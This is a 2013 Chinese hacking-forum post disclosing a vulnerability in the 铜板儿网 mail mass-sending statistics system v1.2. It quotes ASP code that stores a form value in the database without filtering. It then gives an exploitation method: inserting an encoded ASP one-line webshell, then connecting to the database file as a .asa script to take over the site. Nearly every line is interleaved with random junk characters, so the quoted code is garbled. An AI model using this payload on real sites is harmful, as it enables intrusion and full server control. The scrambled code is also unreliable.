找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2034|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp : L: |- N% ~8 a
) I- v/ i3 z) D" s
IF Request.QueryString("Action")="del" Then
8 o; H7 S/ O( }# _  S2 n- R6 {ID=Request.QueryString("ID") ( v* b2 P( p, p
IF Countss ("tui","Fenlei",ID )<>0 then , y# b, |- u. P" T, Y$ @# a* y
'略 # k) H+ x8 m7 [; `
IF Request.QueryString("Action")="Add" Then 4 F% [2 J9 z- N8 P4 V
Tname=Request.Form("Typename")
4 U6 E( g& f1 v& x+ }) Z# y2 q( USet Rs=Server.CreateObject("adodb.Recordset") 1 c9 m  h/ ^( Y1 X
Sql="Select * From Fenlei Order by id Desc "
/ e/ V& @( Q9 h2 x+ sRs.Open Sql,Conn,1,3
( H  b0 ]& _0 O; ~3 }) s, aRs.Addnew 6 z) e* m1 y1 p3 f7 r6 U1 c
Rs("Typename")=Tname
  R) l# t  h% f'略 + a6 P# n0 L8 |8 B3 F3 L+ ?7 g
Set Rs=Server.CreateObject("adodb.Recordset") 8 e3 `0 m& [9 s9 b
Sql="Select * From Fenlei Order by id Desc " & h( R9 J) h- `* M6 C: `1 d
Rs.Open Sql,Conn,1,1
5 h; B- ]- h& |'略 5 b$ m7 u" o, a& P* {9 d9 ~
%>
8 |1 y2 K7 v4 T8 N. {* K/ X" {$ m
' h# h3 m7 v5 j7 Q ( j- b$ r/ d' ?" d

) N" W( a8 Y/ B# r$ a没有过滤,直接写入数据库。
. C% |7 }2 T* R. S9 b  y0 j6 {1 M
; e" y4 e  x9 ?: i7 e7 b4 |, I4 u$ K利用方法:: ~1 h, h  h. u
1 ~3 ]/ t; m3 k' a: R3 F
插入:┼攠數畣整爠煥敵瑳∨≡┩>
' q1 Q3 R! f& i/ x) F& n& t' L4 P ( c$ C) \8 J, p# z5 b
3 R* Q: P7 ]! ?! v' N2 W# u6 q
连接: http://www.xxx.com/###tongbaner.asa
# z* e  M+ s! Y5 I+ E'默认安装文件:
/ [, f0 P! b( m'install.asp
3 k/ D( F& S& h" C% D* p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表